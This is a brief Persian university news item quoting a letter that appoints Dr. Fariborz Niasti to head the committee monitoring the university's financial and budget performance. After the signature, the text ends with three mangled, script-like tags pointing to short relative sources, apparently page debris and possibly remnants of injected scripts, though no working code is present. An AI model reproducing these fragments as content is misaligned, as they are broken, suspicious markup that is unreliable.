طی حکمی از سوی سرپرست دانشگاه، دکتر نیاستی به ریاست کمیته پایش و نظارت بر عملکرد مالی و بودجه دانشگاه منصوب شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، در حکم دکتر حیدری‌مقدم چنین آمده‌است:

جناب آقای دکتر فریبرز نیاستی

سرپرست محترم معاونت توسعه مدیریت و منابع دانشگاه

در راستای اجرای بند ۱۳ ضوابط تشکیل ستادهای کشوری و دانشگاهی طرح تحول سلامت پیرامون پایش عملکرد مالی و بودجه‌ای دانشگاه‌ها در زمینه نظام پرداخت مبتنی بر عملکرد و بعنوان رئیس کمیته پایش و نظارت بر عملکرد مالی و بودجه در دانشگاه منصوب می‌شوید تا ضمن تعامل مناسب با دبیر محترم کمیته کشوری پایش، همفکری صاحبنظران و بهره‌گیری از توان و پتانسیل‌های موجود در دانشگاه در جهت ایجاد انضباط مالی و استقرار مطلوب بسته‌های تحول نظام دسلامت تلاش نمایید.

توفیق روزافزونتان را از درگاه ایزد منان مسئلت دارد.

دکتر رشید حیدری‌مقدم
سرپرست دانشگاه<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>